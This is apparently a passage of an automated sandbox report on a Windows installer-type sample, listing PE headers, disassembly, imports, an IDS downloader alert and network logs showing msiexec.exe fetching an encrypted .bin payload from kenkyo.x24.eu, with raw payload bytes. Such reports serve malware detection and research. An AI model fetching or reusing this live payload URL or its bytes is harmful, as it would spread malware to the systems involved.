                            Time Stamp:0x57807BDD [Sat Jul 9 04:21:49 2016 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                            Entrypoint Preview

                            Instruction
                            sub esp, 000002D4h
                            push ebx
                            push esi
                            push edi
                            push 00000020h
                            pop edi
                            xor ebx, ebx
                            push 00008001h
                            mov dword ptr [esp+14h], ebx
                            mov dword ptr [esp+10h], 0040A2E0h
                            mov dword ptr [esp+1Ch], ebx
                            call dword ptr [004080B0h]
                            call dword ptr [004080ACh]
                            cmp ax, 00000006h
                            je 00007FBB60E75D13h
                            push ebx
                            call 00007FBB60E78E54h
                            cmp eax, ebx
                            je 00007FBB60E75D09h
                            push 00000C00h
                            call eax
                            mov esi, 004082B8h
                            push esi
                            call 00007FBB60E78DCEh
                            push esi
                            call dword ptr [0040815Ch]
                            lea esi, dword ptr [esi+eax+01h]
                            cmp byte ptr [esi], 00000000h
                            jne 00007FBB60E75CECh
                            push ebp
                            push 00000009h
                            call 00007FBB60E78E26h
                            push 00000007h
                            call 00007FBB60E78E1Fh
                            mov dword ptr [00434EE4h], eax
                            call dword ptr [0040803Ch]
                            push ebx
                            call dword ptr [004082A4h]
                            mov dword ptr [00434F98h], eax
                            push ebx
                            lea eax, dword ptr [esp+34h]
                            push 000002B4h
                            push eax
                            push ebx
                            push 0042B208h
                            call dword ptr [00408188h]
                            push 0040A2C8h
                            push 00433EE0h
                            call 00007FBB60E78A08h
                            call dword ptr [004080A8h]
                            mov ebp, 0043F000h
                            push eax
                            push ebp
                            call 00007FBB60E789F6h
                            push ebx
                            call dword ptr [00408174h]
                            add word ptr [eax], 0000h

                            Rich Headers

                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x15e98.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b4.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x637b0x64004219bc0ba21196c40804cc23644c3170False0.671484375data6.484635885032963IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x80000x14b00x1600d6b0bc2db2de2a3dd996fda6539cef0eFalse0.4401633522727273data5.033673390997287IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xa0000x2afd80x6002aa587c909999ca52be17d0f1ffbd186False0.5188802083333334data4.039551377217298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .ndata0x350000x1d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x520000x15e980x160003b730bd64b42aac8130f5ba4c9a33afcFalse0.29524369673295453data3.846594793940323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_BITMAP0x523700x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                            RT_ICON0x526d80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.26295398083520644
                            RT_ICON0x62f000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.38163900414937757
                            RT_ICON0x654a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4200281425891182
                            RT_ICON0x665500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.45901639344262296
                            RT_ICON0x66ed80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.549645390070922
                            RT_DIALOG0x673400x144dataEnglishUnited States0.5216049382716049
                            RT_DIALOG0x674880x13cdataEnglishUnited States0.5506329113924051
                            RT_DIALOG0x675c80x100dataEnglishUnited States0.5234375
                            RT_DIALOG0x676c80x11cdataEnglishUnited States0.6056338028169014
                            RT_DIALOG0x677e80xc4dataEnglishUnited States0.5918367346938775
                            RT_DIALOG0x678b00x60dataEnglishUnited States0.7291666666666666
                            RT_GROUP_ICON0x679100x4cdataEnglishUnited States0.8157894736842105
                            RT_VERSION0x679600x1f8dataEnglishUnited States0.5396825396825397
                            RT_MANIFEST0x67b580x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384

                            Imports

                            DLLImport
                            KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                            USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                            ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                            Version Infos

                            DescriptionData
                            Commentssenestes curmurging flertalsendelsen
                            LegalTrademarksinterregna subnaturally superrighteously
                            ProductNamedagbrkningers
                            Translation0x0409 0x04e4

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-03-14T11:59:25.416764+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.4497235.255.110.9443TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 14, 2025 11:59:21.239389896 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:21.239443064 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:21.239511967 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:21.248712063 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:21.248732090 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.116118908 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.116328955 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.163975954 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.164010048 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.164304018 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.164381027 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.168124914 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.212333918 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.416799068 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.416825056 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.416845083 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.416924953 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.416945934 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.416958094 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.417011023 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.433769941 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.433934927 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.434048891 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.434118986 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.520632029 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.520654917 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.520785093 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.520807981 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.520908117 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.523353100 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.523370028 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.523426056 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.523431063 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.523472071 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.524964094 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.524980068 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.525052071 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.525065899 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.525105953 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.526710033 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.526727915 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.526799917 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.526804924 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.526825905 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.526844978 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.611114025 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.611134052 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.611299992 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.611329079 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.611432076 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.614098072 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.614115000 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.614248037 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.614254951 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.614352942 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.614692926 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.614706993 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.614761114 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.614764929 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.614804029 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.615271091 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.615286112 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.615341902 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.615346909 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.615390062 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.616630077 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.616645098 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.616708994 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.616713047 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.616754055 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.617482901 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.617500067 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.617558002 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.617562056 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.617599964 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.688930035 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.688956976 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.689122915 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.689157009 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.689209938 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.702198982 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.702214956 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.702301979 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.702330112 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.702372074 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.705111027 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.705128908 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.705193043 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.705209017 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.705248117 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.705811977 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.705828905 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.705882072 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.705889940 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.705924988 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.706422091 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.706437111 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.706487894 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.706496000 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.706530094 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.707428932 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.707448006 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.707496881 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.707504034 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.707541943 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.708812952 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.708827972 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.708864927 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.708878994 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.708889961 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.708911896 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.708944082 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.780109882 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.780129910 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.780215025 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.780241013 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.780280113 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.794620037 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.794639111 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795207977 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795233965 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795286894 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795531034 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795557022 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795593023 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795599937 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795630932 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795639992 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795834064 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795888901 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795893908 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795914888 CET443497235.255.110.9192.168.2.4
                            Mar 14, 2025 11:59:25.795929909 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.795965910 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.796061993 CET49723443192.168.2.45.255.110.9
                            Mar 14, 2025 11:59:25.796075106 CET443497235.255.110.9192.168.2.4

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Mar 14, 2025 11:59:21.128202915 CET6375153192.168.2.41.1.1.1
                            Mar 14, 2025 11:59:21.232640028 CET53637511.1.1.1192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 14, 2025 11:59:21.128202915 CET192.168.2.41.1.1.10xa8f1Standard query (0)kenkyo.x24.euA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 14, 2025 11:59:21.232640028 CET1.1.1.1192.168.2.40xa8f1No error (0)kenkyo.x24.eu5.255.110.9A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • kenkyo.x24.eu

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.4497235.255.110.94437356C:\Windows\SysWOW64\msiexec.exe
                            TimestampBytes transferredDirectionData
                            2025-03-14 10:59:25 UTC192OUTGET /wp-includes/QgxEZRXDZppAsQj120.bin HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                            Host: kenkyo.x24.eu
                            Cache-Control: no-cache
                            2025-03-14 10:59:25 UTC251INHTTP/1.1 200 OK
                            Server: nginx
                            Date: Fri, 14 Mar 2025 10:59:25 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 385088
                            Connection: close
                            Last-Modified: Fri, 14 Mar 2025 09:27:29 GMT
                            ETag: "5e040-6304a0c28405c"
                            Accept-Ranges: bytes
                            2025-03-14 10:59:25 UTC16133INData Raw: ca 3b c0 21 fc 66 de 56 9c 29 21 46 ea 46 f4 43 6a 95 ef b6 28 e4 ab 1d de ed 79 fe fd 36 e7 a2 26 11 0f 23 b8 ca ec 29 0d a6 8d 36 f0 cf 98 96 85 b3 82 bd 6a 45 68 99 4a 12 bc 8c ba c2 e9 54 c7 73 02 47 d7 95 d5 a3 4e 5b 1f 36 4a 9d 32 6b da 70 ae 2e 56 bb c9 31 82 b8 f8 74 66 7c 90 2d 31 0f 88 a4 a9 57 63 e2 48 0d da 89 ea 7f 34 f4 42 31 aa 85 a6 a9 0f 4f c2 3f 82 cb 55 94 ef 52 e4 7d 6c ff 2c b7 ba 9a a8 01 7e d8 e1 86 59 e0 e5 3c 7b eb 8a af 32 b7 d8 b2 7c 1e b4 4e 90 cd 0a f3 c5 59 84 76 81 f8 f3 1b 8d 26 a3 32 12 ed 54 80 74 df 0a ee ba d1 a9 a9 90 ad 83 68 30 41 28 0e 38 8e 63 60 6f f3 b5 74 f3 b6 ae af ba 2a a5 47 df 00 30 dd eb 64 c3 b3 a7 f4 fa fd a0 d5 25 b6 1c f5 f4 b4 52 60 1f 31 b6 94 58 b6 4c 9e cf 47 3c c0 da 56 4c f3 ed df 63 14 0b f7 93
                            Data Ascii: ;!fV)!FFCj(y6&#)6jEhJTsGN[6J2kp.V1tf|-1WcH4B1O?UR}l,~Y<{2|NYv&2Tth0A(8c`ot*G0d%R`1XLG<VLc
                            2025-03-14 10:59:25 UTC16384INData Raw: 42 bd b8 16 fe 66 ee fa a0 48 29 ed 33 14 5d 41 f8 53 6a ee d2 c2 35 f3 0d b8 a0 da 98 fa ac d3 a7 b9 0d 93 dd 18 29 48 7a 3d 96 38 f0 ed 35 b8 d2 70 79 51 4d 44 3f 37 66 2d 81 7d 84 80 58 b6 8a 7c 07 d4 bb 7f ef 26 b3 a9 e4 f9 8c 2a f8 f4 af da 04 ba 44 44 c8 d2 2e 97 b7 4b 91 92 ef e9 99 57 a8 3b c6 30 1e 15 59 2a 6d 5d ed c7 07 65 8a b1 a2 ac 5b 5f 78 7c 0f 09 fe b4 0d 69 eb 46 94 84 8b 4d b8 8e 09 2a 42 b4 3a fc fd 2a cb 7d e7 4f 3e 02 09 34 a7 05 77 ef 0a 55 90 c5 fd ca a2 31 ee c9 a5 af d2 f4 fb ec ee f4 fd 8c 60 4d be f9 34 a7 b0 55 29 09 c9 13 7e 64 c3 c7 67 e9 bd ed fc 6a 36 c5 85 32 c2 f9 52 42 2f 20 38 2e b5 23 6d 65 cc bc cc 14 ef 21 41 ce 93 66 9d 9d 04 93 a4 e7 1b ee 51 f8 03 09 26 3a f8 52 10 0f e7 64 06 01 ac ae 1e 6b 05 59 6c fb ce 12 27
                            Data Ascii: BfH)3]ASj5)Hz=85pyQMD?7f-}X|&*DD.KW;0Y*m]e[_x|iFM*B:*}O>4wU1`M4U)~dgj62RB/ 8.#me!AfQ&:RdkYl'
                            2025-03-14 10:59:25 UTC16384INData Raw: 0c a8 af b2 70 cc 0e f8 b1 74 6a 8b 99 e7 e6 29 71 62 60 c2 82 c7 44 92 d5 ef cd db e2 81 15 8e 07 65 f4 42 96 f2 a8 41 42 c6 41 d2 9d 1e 6c ab 9e 27 91 52 b2 05 01 84 00 11 c6 39 9b 35 1d 6a 9f 5f ed 31 89 f0 92 08 1d 76 1f fe 31 0b 07 bc 2c 5b 16 7a f3 7b 3f 6f fb 25 7c 42 e8 65 e3 3b 68 0e 7c 70 d2 a1 09 06 53 51 03 d2 b1 ae 13 6f 23 17 9d d1 ac 0a 86 0b dc a9 6a 97 4b 5b d2 8b b8 e6 ac ec 75 c7 8d 06 e0 2c 71 7f b3 b9 29 58 cc f2 64 56 d3 aa e1 0b 32 21 f3 9a da 4a 35 6e 3c 98 eb e6 a1 3f c1 b4 2a 90 51 5c 8b 0c 79 cd 47 c1 17 b8 d8 b8 9a 70 c0 ff 36 91 fe 36 c7 d3 f0 cf 38 66 1d 20 2f 22 89 9c da bd de 01 af 08 a8 5c 60 75 c8 a4 f7 f2 50 33 b6 2d c7 35 35 fc 01 fc 9d be 6f 3c b6 b2 f5 ce e7 61 19 00 07 aa 34 e0 f7 10 71 98 82 f8 20 e4 db 22 66 0d 5e
                            Data Ascii: ptj)qb`DeBABAl'R95j_1v1,[z{?o%|Be;h|pSQo#jK[u,q)XdV2!J5n<?*Q\yGp668f /"\`uP3-55o<a4q "f^
                            2025-03-14 10:59:25 UTC16384INData Raw: 69 e9 eb b0 16 14 43 af 21 f9 a3 66 55 e7 b2 13 ec 5f f0 61 7b 88 6e 18 5a 0b 1e 35 a2 24 58 0a 71 9f 74 1a 0d f9 cc f5 80 36 04 b9 84 df f6 5f a1 d3 cb 87 17 22 a3 06 b0 4f bb 51 0c 64 ee 64 95 6d a2 bb f3 fc 80 d9 2e 76 22 91 81 28 04 78 0e 34 f9 2b c7 79 c3 21 3f 49 45 8b 6e ac 7c f1 bd 92 4f 0a f9 34 dd 2b 0c 40 ba 2c ca 41 e3 f1 1c dd 96 b9 17 82 d7 9f e3 9f 7a 6f 13 d6 d0 22 ed 60 a1 49 0c f7 7f 2c 43 73 ae 47 4a 54 84 c1 3f 34 f3 1e 41 88 b2 f4 9a 8b 42 cb 43 36 82 76 a9 2d 89 fc 99 94 a2 00 88 45 51 88 52 19 18 09 85 53 ad 33 af 8a df bd 1c 10 d9 ef e6 de 55 28 dd 97 64 5d b3 b4 ab 29 0f 7d 52 91 3a 73 12 2d 09 97 6e e8 c4 83 41 61 e0 ab cd 44 e4 5d 37 d8 7a 03 34 4e 8d 09 1f d1 49 a8 ab 60 2a ad e6 b3 61 67 0b 7f f3 63 07 fc a3 9d 30 0a 03 67 0c
                            Data Ascii: iC!fU_a{nZ5$Xqt6_"OQddm.v"(x4+y!?IEn|O4+@,Azo"`I,CsGJT?4ABC6v-EQRS3U(d])}R:s-nAaD]7z4NI`*agc0g
                            2025-03-14 10:59:25 UTC16384INData Raw: cb d4 f6 31 01 fa 3f 43 be 46 b0 9a dc 4b 68 9f 86 f2 66 be 61 50 db 1c e5 c5 55 e0 cb f8 3d 87 23 c9 3e 1a 86 0e c6 09 54 b9 96 97 69 1d bb a3 dc a6 ef ef 2a 2c cf c4 4f d5 c0 8d 7d be 54 b5 f9 e2 0d 95 90 32 6e f9 56 f6 e6 3f 7e fa a5 f0 a9 9a 34 34 f3 35 98 e9 f7 49 c3 a8 39 58 d8 96 5a 74 96 52 a2 55 79 67 12 d2 fb a0 47 21 69 5c 33 c3 9c 7b 3c 93 7d 75 0e 6c be b1 0d ab bb 5b 58 86 7e 4f 68 7b 44 d2 a5 c1 88 f6 b1 95 fb 2d 1a 7c 97 ca 22 57 1c 7a 85 a6 c1 2a 0d 6a e7 35 6d 32 62 82 16 e1 86 f6 f3 67 02 1d 05 3d 4e 17 9e f7 31 b4 d1 45 f3 f6 fb 35 08 ca ae 0d 01 68 3e 00 03 71 56 9e af 64 f1 0a 3c e1 9a a5 93 a5 02 6f af 3a af b0 48 6a 97 79 c8 f8 9a 80 ee c4 b2 82 94 77 62 88 f9 c9 68 de 3f ee ca c4 cb 12 3e da fa 61 15 00 b7 93 9a ca e1 de f3 ed e2
                            Data Ascii: 1?CFKhfaPU=#>Ti*,O}T2nV?~445I9XZtRUygG!i\3{<}ul[X~Oh{D-|"Wz*j5m2bg=N1E5h>qVd<o:Hjywbh?>a
